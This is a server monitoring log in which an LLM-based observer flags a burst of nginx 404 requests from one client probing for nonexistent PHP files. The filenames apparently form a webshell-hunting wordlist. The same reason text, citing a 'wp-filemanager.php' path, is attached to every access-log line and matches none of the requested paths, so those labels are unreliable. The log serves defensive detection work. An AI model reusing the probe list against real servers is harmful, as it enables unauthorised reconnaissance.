Mar 20 14:04:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:27.537737 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:00.382139758Z 4.204.200.32 - - [20/Mar/2026:13:59:00 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /wen.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:31.936986 [observer] Pipeline: processed=6035 pattern_hits=5673 llm_calls=362 llm_errors=3 learned=4
Mar 20 14:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:31.937011 [observer] Patterns: hash=5673 prefix=0 regex=0 contains=0 deny=68 alert=492 suppress=0 misses=362
Mar 20 14:04:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:36.405420 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:04:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:36.405464 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error log showing a missing file in response to a request for wp5.php suggests a potential probing for WordPress-related files; not definitively malicious but worth monitoring. Line=2026-03-20T13:59:00.451384483Z 2026/03/20 13:59:00 [error] 422#422: *750796 open() "/usr/share/nginx/default/wp5.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:04:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:36.405534 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:00.451485168Z 4.204.200.32 - - [20/Mar/2026:13:59:00 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /wp5.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:04:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:41.661641 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:04:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:41.661682 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Failed to open a likely targeted PHP file (varb.php) from a common web request, indicating possible probing or misconfigured file paths. Line=2026-03-20T13:59:00.519299615Z 2026/03/20 13:59:00 [error] 422#422: *750796 open() "/usr/share/nginx/default/varb.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:04:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:41.661749 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:00.519423759Z 4.204.200.32 - - [20/Mar/2026:13:59:00 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /varb.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:04:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:48.314360 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:04:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:48.314397 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request for a PHP file (tt.php) resulting in a missing file error; could indicate probing for vulnerable files. Line=2026-03-20T13:59:00.588218232Z 2026/03/20 13:59:00 [error] 422#422: *750796 open() "/usr/share/nginx/default/tt.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "G...
Mar 20 14:04:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:48.314471 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:00.588310339Z 4.204.200.32 - - [20/Mar/2026:13:59:00 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /tt.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:04:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:55.478085 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 14:04:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:55.478123 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP error indicating missing file gettest.php; could indicate probing or misconfiguration. Line=2026-03-20T13:59:00.656214326Z 2026/03/20 13:59:00 [error] 422#422: *750796 open() "/usr/share/nginx/default/gettest.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, reques...
Mar 20 14:04:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:55.478206 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:00.656296901Z 4.204.200.32 - - [20/Mar/2026:13:59:00 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /gettest.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:01.871586 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:01.871627 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual  error log showing a request to vx.php leading to a missing file, indicative of probing or misconfiguration Line=2026-03-20T13:59:00.726255910Z 2026/03/20 13:59:00 [error] 422#422: *750796 open() "/usr/share/nginx/default/vx.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "G...
Mar 20 14:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:01.871733 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:00.726367578Z 4.204.200.32 - - [20/Mar/2026:13:59:00 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /vx.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:01.943053 [observer] Pipeline: processed=6045 pattern_hits=5678 llm_calls=367 llm_errors=3 learned=4
Mar 20 14:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:01.943080 [observer] Patterns: hash=5678 prefix=0 regex=0 contains=0 deny=68 alert=497 suppress=0 misses=367
Mar 20 14:05:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:08.151692 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:05:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:08.151732 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error indicating a missing file /usr/share/nginx/default/abrand.php while handling a GET request. This can be normal if assets are missing, but it could also indicate probing for PHP files or misconfigured webroot. Line=2026-03-20T13:59:00.794080403Z 2026/03/20 13:59:00 [error] 422#422: *750796 open() "/usr/share/nginx/default/abrand.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request...
Mar 20 14:05:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:08.151801 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:00.794201167Z 4.204.200.32 - - [20/Mar/2026:13:59:00 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /abrand.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:05:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:12.570437 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:05:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:12.570475 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unauthorized-looking request to a PHP file combined with an open() failure indicates probing or misconfigured route, common in vulnerability scanning. Line=2026-03-20T13:59:00.865677830Z 2026/03/20 13:59:00 [error] 422#422: *750796 open() "/usr/share/nginx/default/8573.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:05:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:12.570540 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:00.865708975Z 4.204.200.32 - - [20/Mar/2026:13:59:00 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /8573.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:05:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:18.479935 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:05:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:18.479974 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempt to access bolt.php resulting in file not found; could indicate probing for PHP endpoints or misconfigured paths. Line=2026-03-20T13:59:00.933399258Z 2026/03/20 13:59:00 [error] 422#422: *750796 open() "/usr/share/nginx/default/bolt.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:05:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:18.480050 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:00.933485149Z 4.204.200.32 - - [20/Mar/2026:13:59:00 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /bolt.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:05:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:23.230203 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:05:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:23.230241 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to tfm.php under nginx with missing file indicates potential probing or local file inclusion attempt; multiple such probes can precede an attack. Line=2026-03-20T13:59:01.001406822Z 2026/03/20 13:59:01 [error] 422#422: *750796 open() "/usr/share/nginx/default/tfm.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:05:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:23.230321 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:01.001585237Z 4.204.200.32 - - [20/Mar/2026:13:59:01 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /tfm.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:05:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:29.918446 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:05:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:29.918482 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Probe-like request for a PHP file that does not exist, which could indicate attempting to discover vulnerable scripts. Line=2026-03-20T13:59:01.069396101Z 2026/03/20 13:59:01 [error] 422#422: *750796 open() "/usr/share/nginx/default/lm15.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:05:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:29.918545 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:01.069449662Z 4.204.200.32 - - [20/Mar/2026:13:59:01 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /lm15.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:31.939507 [observer] Pipeline: processed=6055 pattern_hits=5683 llm_calls=372 llm_errors=3 learned=4
Mar 20 14:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:31.939534 [observer] Patterns: hash=5683 prefix=0 regex=0 contains=0 deny=68 alert=502 suppress=0 misses=372
Mar 20 14:05:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:36.887862 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:05:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:36.887903 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Requested non-existent WP file under wp-admin path; potential probing for WordPress admin resources Line=2026-03-20T13:59:01.137275011Z 2026/03/20 13:59:01 [error] 422#422: *750796 open() "/usr/share/nginx/default/wp-admin/css/bolt.php" failed (2: No such file or directory), client: 4.204.200.32, server:...
Mar 20 14:05:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:36.887980 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:01.137285947Z 4.204.200.32 - - [20/Mar/2026:13:59:01 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /wp-admin/css/bolt.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:05:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:41.526946 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:05:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:41.526985 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Requested PHP file nw.php not found; could indicate probing for vulnerable PHP files on the server. Line=2026-03-20T13:59:01.204954724Z 2026/03/20 13:59:01 [error] 422#422: *750796 open() "/usr/share/nginx/default/nw.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "G...
Mar 20 14:05:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:41.527053 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:01.205067105Z 4.204.200.32 - - [20/Mar/2026:13:59:01 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET //nw.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:05:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:46.392368 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:05:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:46.392408 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to a likely sensitive PHP file that does not exist, indicating probing/scan behavior against the web server. Line=2026-03-20T13:59:01.272690483Z 2026/03/20 13:59:01 [error] 422#422: *750796 open() "/usr/share/nginx/default/bnm.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:05:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:46.392473 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:01.272802713Z 4.204.200.32 - - [20/Mar/2026:13:59:01 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /bnm.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:05:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:51.864621 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.75 action=alert pattern_type=
Mar 20 14:05:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:51.864658 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error log shows an attempt to access /nw.php which does not exist; could indicate probing for PHP file disclosure or misconfigured routing. Line=2026-03-20T13:59:01.340600013Z 2026/03/20 13:59:01 [error] 422#422: *750796 open() "/usr/share/nginx/default/nw.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "G...
Mar 20 14:05:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:51.864722 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:01.340685242Z 4.204.200.32 - - [20/Mar/2026:13:59:01 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /nw.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:05:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:57.077184 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 14:05:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:57.077220 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error open() for a suspicious PHP file (s.php) in nginx default path with a client probing pattern; indicates potential web probing or misconfiguration rather than a confirmed attack. Line=2026-03-20T13:59:01.408394589Z 2026/03/20 13:59:01 [error] 422#422: *750796 open() "/usr/share/nginx/default/s.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "GE...
Mar 20 14:05:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:05:57.077284 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:01.408406326Z 4.204.200.32 - - [20/Mar/2026:13:59:01 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /s.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:01.346541 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:01.346586 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP error for a PHP file that may be part of an automated probe; could indicate and attempt to discover exposed files. Not definitive malware but warrants monitoring. Line=2026-03-20T13:59:01.476613063Z 2026/03/20 13:59:01 [error] 422#422: *750796 open() "/usr/share/nginx/default/hplfuns.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, reques...
Mar 20 14:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:01.346651 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:01.477802659Z 4.204.200.32 - - [20/Mar/2026:13:59:01 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /hplfuns.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:01.967558 [observer] Pipeline: processed=6067 pattern_hits=5689 llm_calls=378 llm_errors=3 learned=4
Mar 20 14:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:01.967584 [observer] Patterns: hash=5689 prefix=0 regex=0 contains=0 deny=68 alert=508 suppress=0 misses=378
Mar 20 14:06:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:05.188640 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:06:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:05.188680 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access pattern to /jp.php and missing file could indicate a targeted probe or misconfigured route. It's an error but not definitive evidence of compromise. Line=2026-03-20T13:59:01.548867434Z 2026/03/20 13:59:01 [error] 422#422: *750796 open() "/usr/share/nginx/default/jp.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "G...
Mar 20 14:06:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:05.188757 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:01.548911339Z 4.204.200.32 - - [20/Mar/2026:13:59:01 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /jp.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:06:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:10.213536 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:06:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:10.213578 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An HTTP request sequence log shows an attempted access to a PHP file that does not exist, which can be part of a scan or probing activity targeting common web app files. Line=2026-03-20T13:59:01.621020569Z 2026/03/20 13:59:01 [error] 422#422: *750796 open() "/usr/share/nginx/default/xsas.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:06:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:10.213659 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:01.621043147Z 4.204.200.32 - - [20/Mar/2026:13:59:01 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /xsas.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:06:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:16.554052 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:06:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:16.554090 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a PHP file under /5b9ac.php causing an open() failure suggests probing for vulnerable PHP scripts or missing files, a common web app attack pattern. Line=2026-03-20T13:59:01.693705718Z 2026/03/20 13:59:01 [error] 422#422: *750796 open() "/usr/share/nginx/default/5b9ac.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request:...
Mar 20 14:06:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:16.554154 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:01.693769366Z 4.204.200.32 - - [20/Mar/2026:13:59:01 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /5b9ac.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:06:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:20.433149 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:06:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:20.433206 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request for /okxh.php resulting in file not found; could be probing for hidden PHP resources or a webshell. Line=2026-03-20T13:59:01.779769850Z 2026/03/20 13:59:01 [error] 422#422: *750796 open() "/usr/share/nginx/default/okxh.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:06:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:20.433282 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:01.779853471Z 4.204.200.32 - - [20/Mar/2026:13:59:01 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /okxh.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:06:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:20.433331 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:01.849737186Z 4.204.200.32 - - [20/Mar/2026:13:59:01 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /rzki.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:06:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:29.486704 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:06:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:29.486744 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to non-existent PHP file (rzki.php) and open() failure indicates probing for files; could indicate an attacker attempting to discover exploitable paths. Line=2026-03-20T13:59:01.849736468Z 2026/03/20 13:59:01 [error] 422#422: *750796 open() "/usr/share/nginx/default/rzki.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:31.938791 [observer] Pipeline: processed=6077 pattern_hits=5694 llm_calls=383 llm_errors=3 learned=4
Mar 20 14:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:31.938818 [observer] Patterns: hash=5694 prefix=0 regex=0 contains=0 deny=68 alert=513 suppress=0 misses=383
Mar 20 14:06:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:39.269841 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:06:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:39.269876 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /edit.php attempted and the file does not exist, which can indicate probing for sensitive PHP files. Line=2026-03-20T13:59:01.927029718Z 2026/03/20 13:59:01 [error] 422#422: *750796 open() "/usr/share/nginx/default/edit.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
